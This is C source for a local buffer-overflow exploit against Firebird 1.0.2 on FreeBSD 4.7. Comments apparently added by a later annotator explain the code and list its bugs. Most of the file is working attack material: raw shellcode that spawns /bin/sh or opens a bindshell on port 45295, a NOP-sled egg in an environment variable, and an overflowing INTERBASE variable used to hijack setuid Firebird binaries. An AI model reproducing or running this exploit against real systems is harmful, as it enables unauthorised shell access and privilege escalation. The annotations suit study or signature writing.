
  1. /* DSR-firebird.c by bob@dtors.net
  2.    -------------------------------
  3.  
  4. Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
  5.  
  6. bash-2.05a$ ./DSR-firebird
  7. ( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
  8. ( (                           by - bob@dtors.net ) )
  9. ----------------------------------------------------
  10.  
  11. Usage: ./DSR-firebird <target#>
  12. Targets:
  13. 1. [0xbfbff75d] - gds_inet_server
  14. 2. [0xbfbff75c] - gds_lock_mgr
  15. 3. [0xbfbff75e] - gds_drop
  16.  
  17. www.dtors.net
  18. bash-2.05a$
  19.  
  20. Thanks goto eSDee && ilja for helping me
  21. with the gds_lock_mgr problems.
  22.  
  23. bob@dtors.net
  24. */
  25.  
  26.  
  27. #include <stdio.h>
  28. #include <stdlib.h>
  29. #include <string.h>
/* Absolute paths of the three Firebird binaries that main() exec's.
 * They are hard-coded to the layout of the tested host (see the header
 * comment); nothing checks that they exist before execl(). */
#define LOCK    "/usr/local/firebird/bin/gds_lock_mgr"
#define DROP    "/usr/local/firebird/bin/gds_drop"
#define INET    "/usr/local/firebird/bin/gds_inet_server"
/* Size of the stack array that becomes the INTERBASE environment value.
 * main() stores the return address at offset LEN-4 and then writes a NUL
 * at offset LEN, which is one past the end of a LEN-element array. */
#define LEN     1056
  34.  
/* Raw machine-code payloads, one per target; decide() picks one by the
 * command-line argument.  dropcode and inetcode are byte-for-byte identical,
 * so targets 1 and 3 differ only in which binary is exec'd.  The inline
 * notes on lockcode are the author's own labels.  None of the three arrays
 * contains a 0x00 byte, which main() relies on when it sizes the selected
 * payload with strlen(). */
char dropcode[]=
        "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
   "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
   "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

/* Identical to dropcode (see above). */
char inetcode[]=
        "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
   "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
   "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";



/* Longer payload used for gds_lock_mgr; main() prints that this one
 * listens on port 45295 and that the exploit process will hang.  The
 * first ten bytes of the "setuid" fragment match the start of dropcode
 * and inetcode, which is useful when writing a byte-pattern detection. */
char lockcode[]=
 "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
 "\x39\xc3\x75\x06\x31\xc0\xb0\x01\xcd\x80"
 "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80" // setuid[firebird] by bob
 "\x31\xc0\x31\xdb\x53\xb3\x06\x53" // fork() bindshell by eSDee
 "\xb3\x01\x53\xb3\x02\x53\x54\xb0"
 "\x61\xcd\x80\x89\xc7\x31\xc0\x50"
 "\x50\x50\x66\x68\xb0\xef\xb7\x02"
      "\x66\x53\x89\xe1\x31\xdb\xb3\x10"
      "\x53\x51\x57\x50\xb0\x68\xcd\x80"
      "\x31\xdb\x39\xc3\x74\x06\x31\xc0"
      "\xb0\x01\xcd\x80\x31\xc0\x50\x57"
      "\x50\xb0\x6a\xcd\x80\x31\xc0\x31"
      "\xdb\x50\x89\xe1\xb3\x01\x53\x89"
      "\xe2\x50\x51\x52\xb3\x14\x53\x50"
      "\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
      "\x57\x50\xb0\x1e\xcd\x80\x89\xc6"
      "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
      "\x39\xc3\x75\x44\x31\xc0\x57\x50"
      "\xb0\x06\xcd\x80\x31\xc0\x50\x56"
      "\x50\xb0\x5a\xcd\x80\x31\xc0\x31"
      "\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
      "\x80\x31\xc0\x43\x53\x56\x50\xb0"
      "\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
      "\x2f\x73\x68\x68\x2f\x62\x69\x6e"
      "\x89\xe3\x50\x54\x53\x50\xb0\x3b"
      "\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
      "\x31\xc0\x56\x50\xb0\x06\xcd\x80"
      "\xeb\x9a";
  78.  
/* Map the target number from the command line to its payload.
 *
 * string: argv[1] as given by the user; compared with strcmp(), so only the
 *         exact strings "1", "2" and "3" are accepted.
 * Returns a pointer to the first byte of inetcode ("1"), lockcode ("2") or
 * dropcode ("3").  Any other value terminates the process via exit(0):
 * silently, and with a success status, so a mistyped argument is never
 * reported to the user. */
char *decide(char *string)
{
    if(!(strcmp(string, "1")))
      return((char *)&inetcode);   /* &inetcode is char (*)[N]; the cast yields the address of byte 0 */
    if(!(strcmp(string, "2")))
      return((char *)&lockcode);
    if(!(strcmp(string, "3")))
      return((char *)&dropcode);
    exit(0);   /* exit() does not return, so the missing trailing return is only a compiler-warning issue */
}
  89.  
/* Entry point: builds two environment variables and exec's the selected
 * Firebird binary in that environment.
 *
 *   EGG       - 1023 bytes: a run of 0x90 followed by the selected payload,
 *               with "EGG=" overwriting the first four bytes, then a NUL.
 *   INTERBASE - LEN bytes of 0x41 with `ret` stored little-endian at
 *               offset 1052.
 *
 * Presumably the target copies INTERBASE into a fixed-size stack buffer and
 * `ret` is meant to land in the EGG sled — TODO confirm against the
 * Firebird 1.0.2 source.  The single hard-coded address only fits the
 * tested FreeBSD 4.7 build; note that it also disagrees with the three
 * per-target addresses listed in the file's header comment.
 *
 * Known defects in this block (left as-is here):
 *   - buffer[1056] = 0 writes one past the end of buffer[LEN].
 *   - buffer contains no NUL within its LEN bytes, so setenv() reads past
 *     the array until it finds one — it depends on the out-of-bounds
 *     write above having landed on the stack slot that follows.
 *   - `ret` is unsigned long but printed with "%x" (should be "%lx").
 *   - `i` is int but is compared against size_t expressions from strlen().
 *   - execl() failures are not reported; the function just returns 0.
 */
int main(int argc, char **argv)
{

 unsigned long ret = 0xbfbff743;   /* same value for all three targets, unlike the header comment */

 char *selectcode;
 char buffer[LEN];                 /* becomes the INTERBASE value */
 char egg[1024];                   /* becomes the EGG value; handed to putenv() below */
 char *ptr;
 int i=0;



 if(argc < 2)
 {
  printf("( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )\n");
  printf("( (                           by - bob@dtors.net ) )\n");
  printf("----------------------------------------------------\n\n");
  printf("Usage: %s <target#> \n", argv[0]);
  printf("Targets:\n");
  printf("1. [0xbfbff743] - gds_inet_server\n");
  printf("2. [0xbfbff743] - gds_lock_mgr\n");
  printf("3. [0xbfbff743] - gds_drop\n");
  printf("\nwww.dtors.net\n");
  exit(0);
 }

 selectcode = (char *)decide(argv[1]);   /* decide() exit()s on an unknown target number */
   memset(buffer, 0x41, sizeof(buffer));

        ptr = egg;

        /* Fill egg with 0x90 up to (1023 - payload length), then the payload
         * itself; both bounds come from strlen(), so the payload must not
         * contain a 0x00 byte (none of the three arrays does). */
        for (i = 0; i < 1024 - strlen(selectcode) -1; i++) *(ptr++) = 0x90;
        for (i = 0; i < strlen(selectcode); i++) *(ptr++) = selectcode[i];
        egg[1024 - 1] = '\0';

        /* The name is stamped over the first four sled bytes rather than prepended. */
        memcpy(egg,"EGG=",4);
        putenv(egg);   /* putenv() may retain the pointer rather than copy; harmless only because execl() follows immediately */

        memcpy(&buffer[1052],(char *)&ret,4);   /* native byte order of the host */
        buffer[1056] = 0;                       /* BUG: index LEN is out of bounds for buffer[LEN] */

        setenv("INTERBASE", buffer, 1);   /* relies on a NUL somewhere past the end of buffer */

        fprintf(stdout, "Return Address: 0x%x\n", ret);   /* format/argument mismatch: ret is unsigned long */
        fprintf(stdout, "Buffer Size: %d\n", LEN);
        fprintf(stdout, "Setuid [90]\n");

/* Dispatch on which payload was selected; each branch only returns if execl() fails. */
if(selectcode == (char *)&inetcode)
  {
 execl(INET, INET, NULL);
 return 0;
   }

if(selectcode == (char *)&lockcode)
  {
  printf("\nShell is on port 45295\nExploit will hang!\n");
 execl(LOCK, LOCK, NULL);
 return 0;
   }

if(selectcode == (char *)&dropcode)
  {
 execl(DROP, DROP, NULL);
 return 0;
   }


 return 0;   /* unreachable: decide() returns one of the three arrays or exits */
}
  160.